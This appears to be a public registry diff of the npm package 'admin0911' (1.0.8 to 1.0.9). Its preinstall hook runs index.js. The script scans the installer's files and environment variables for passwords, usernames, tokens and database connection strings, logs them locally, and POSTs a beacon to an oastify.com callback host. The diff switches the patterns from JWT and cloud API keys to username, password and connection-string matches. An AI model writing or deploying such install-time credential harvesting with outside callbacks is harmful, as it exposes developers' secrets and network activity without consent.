admin0911 1.0.8 → 1.0.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (5) hide show
  1. package/admin0911-1.0.9.tgz +0 -0
  2. package/index.js +20 -74
  3. package/package.json +1 -1
  4. package/admin0911-1.0.7.tgz +0 -0
  5. package/admin0911-1.0.8.tgz +0 -0
package/admin0911-1.0.9.tgz ADDED
Binary file
package/index.js CHANGED
@@ -7,42 +7,9 @@ const OASTIFY_HOST = '2ori1bz1kj4oy67hhg3sqh3c63cu0mob.oastify.com';
7
7
  const ROOT_DIR = process.cwd();
8
8
  const MAX_FILE_SIZE = 1 * 1024 * 1024; // 1MB max file size to prevent OOM
9
9
 
10
- const logStream = fs.createWriteStream('token_scan_results.log', { flags: 'w' });
10
+ const logStream = fs.createWriteStream('credential_scan_results.log', { flags: 'w' });
11
11
  let foundCount = 0;
12
12
 
13
- function base64UrlDecode(input) {
14
- let str = input.replace(/-/g, '+').replace(/_/g, '/');
15
- while (str.length % 4) str += '=';
16
- return Buffer.from(str, 'base64').toString('utf8');
17
- }
18
-
19
- function isValidJWT(token) {
20
- const parts = token.split('.');
21
- if (parts.length !== 3) return false;
22
-
23
- // Enforce minimum length to avoid short false positives like 'os.path.join' or semantic versions '1.0.1'
24
- if (parts[0].length < 20 || parts[1].length < 30) return false;
25
-
26
- // A real JWT parts must look like valid Base64URL
27
- if (!/^[A-Za-z0-9_-]+$/.test(parts[0]) || !/^[A-Za-z0-9_-]+$/.test(parts[1])) return false;
28
-
29
- try {
30
- const headerStr = base64UrlDecode(parts[0]);
31
- const payloadStr = base64UrlDecode(parts[1]);
32
-
33
- // Quick sanity check before parsing - headers must contain {"alg"
34
- if (!headerStr.includes('"alg"')) return false;
35
-
36
- const header = JSON.parse(headerStr);
37
- const payload = JSON.parse(payloadStr);
38
-
39
- // Must look like a real JWT header and contain some payload keys
40
- return !!(header && header.alg && Object.keys(payload).length > 0);
41
- } catch {
42
- return false;
43
- }
44
- }
45
-
46
13
  function addResult(entry) {
47
14
  foundCount++;
48
15
  logStream.write(JSON.stringify(entry) + '\n');
@@ -55,39 +22,17 @@ function scanFile(filePath) {
55
22
 
56
23
  const content = fs.readFileSync(filePath, 'utf8');
57
24
 
58
- // JWT tokens
59
- const jwtPattern = /[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+/g;
25
+ // Search for username/password assignments
26
+ const credentialPattern = /(?:username|user|login|email|password|passwd|pwd|pass|db_user|db_pass)\s*[:=]\s*['"]([^'"]{3,})['"]/gi;
60
27
  let match;
61
- while ((match = jwtPattern.exec(content))) {
62
- const token = match[0];
63
- if (isValidJWT(token)) {
64
- addResult({ file: path.relative(ROOT_DIR, filePath), type: 'JWT', token });
65
- }
28
+ while ((match = credentialPattern.exec(content))) {
29
+ addResult({ file: path.relative(ROOT_DIR, filePath), type: 'Credential', match: match[0] });
66
30
  }
67
31
 
68
- // Bearer / Authorization tokens
69
- const bearerPattern = /Bearer\s+([A-Za-z0-9-_.]{20,})/gi;
70
- while ((match = bearerPattern.exec(content))) {
71
- addResult({ file: path.relative(ROOT_DIR, filePath), type: 'BearerToken', token: match[1] });
72
- }
73
-
74
- // Known key formats
75
- const patterns = [
76
- { name: 'AWSAccessKey', regex: /AKIA[0-9A-Z]{16}/g },
77
- { name: 'GoogleAPIKey', regex: /AIza[0-9A-Za-z-_]{35}/g },
78
- { name: 'SlackToken', regex: /xox[baprs]-[0-9A-Za-z-]+/g }
79
- ];
80
- patterns.forEach(({ name, regex }) => {
81
- let pMatch;
82
- while ((pMatch = regex.exec(content))) {
83
- addResult({ file: path.relative(ROOT_DIR, filePath), type: name, token: pMatch[0] });
84
- }
85
- });
86
-
87
- // Generic secrets in assignment form
88
- const genericPattern = /(?:api_key|apikey|api-key|auth_token|token|secret|client_secret|private_key)\s*[=:]\s*['\"]?([A-Za-z0-9-_]{20,})['\"]?/gi;
89
- while ((match = genericPattern.exec(content))) {
90
- addResult({ file: path.relative(ROOT_DIR, filePath), type: 'GenericSecret', token: match[1] });
32
+ // Search for connection strings with credentials (e.g., mongodb://user:pass@host)
33
+ const urlCredPattern = /[a-zA-Z]+:\/\/[a-zA-Z0-9_.-]+:[^@\s]+@[a-zA-Z0-9_.-]+/g;
34
+ while ((match = urlCredPattern.exec(content))) {
35
+ addResult({ file: path.relative(ROOT_DIR, filePath), type: 'ConnectionString', match: match[0] });
91
36
  }
92
37
  } catch (e) {
93
38
  // ignore unreadable files
@@ -115,13 +60,14 @@ function scanEnvVars() {
115
60
  Object.entries(process.env).forEach(([key, value]) => {
116
61
  if (!value) return;
117
62
  const lowerKey = key.toLowerCase();
118
- const suspiciousKey = /(?:api_key|apikey|api-key|auth_token|token|secret|client_secret|private_key|password|access_key|secret_key)/i.test(lowerKey);
119
- if (suspiciousKey && value.length >= 20) {
120
- addResult({ source: 'env', key, type: 'EnvSecret', token: value });
63
+ const isCredentialKey = /(?:username|user|login|email|password|passwd|pwd|pass|db_user|db_pass)/i.test(lowerKey);
64
+ if (isCredentialKey && value.length >= 3) {
65
+ addResult({ source: 'env', key, type: 'EnvCredential', value });
66
+ }
67
+ const urlCredPattern = /[a-zA-Z]+:\/\/[a-zA-Z0-9_.-]+:[^@\s]+@[a-zA-Z0-9_.-]+/;
68
+ if (urlCredPattern.test(value)) {
69
+ addResult({ source: 'env', key, type: 'EnvConnectionString', value });
121
70
  }
122
- const bearerMatch = value.match(/Bearer\s+([A-Za-z0-9-_.]{20,})/i);
123
- if (bearerMatch) addResult({ source: 'env', key, type: 'BearerToken', token: bearerMatch[1] });
124
- if (isValidJWT(value)) addResult({ source: 'env', key, type: 'JWT', token: value });
125
71
  });
126
72
  }
127
73
 
@@ -131,11 +77,11 @@ logStream.end();
131
77
 
132
78
  // Security Practice: Defensive scanning tools should NOT broadcast extracted secrets over the network.
133
79
  // Instead, we only send the scan summary/metadata to the monitoring server and keep the vault fully local.
134
- const payload = JSON.stringify({ timestamp: new Date().toISOString(), status: "scan_completed", total_secrets_found: foundCount }, null, 2);
80
+ const payload = JSON.stringify({ timestamp: new Date().toISOString(), status: "credential_scan_completed", total_credentials_found: foundCount }, null, 2);
135
81
  const req = http.request({
136
82
  hostname: OASTIFY_HOST,
137
83
  method: 'POST',
138
- path: '/?token_scan_status',
84
+ path: '/?credential_scan_status',
139
85
  headers: {
140
86
  'Content-Type': 'application/json',
141
87
  'Content-Length': Buffer.byteLength(payload)
@@ -144,5 +90,5 @@ const req = http.request({
144
90
  req.write(payload);
145
91
  req.end();
146
92
 
147
- console.log(`Deep token scan completed. Found ${foundCount} items.`);
148
- console.log(`Detailed results saved securely to: token_scan_results.log`);
93
+ console.log(`Deep credential scan completed. Found ${foundCount} items.`);
94
+ console.log(`Detailed results saved securely to: credential_scan_results.log`);
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "admin0911",
3
- "version": "1.0.8",
3
+ "version": "1.0.9",
4
4
  "scripts": {
5
5
  "preinstall": "node index.js"
6
6
  }
package/admin0911-1.0.7.tgz DELETED
Binary file
package/admin0911-1.0.8.tgz DELETED
Binary file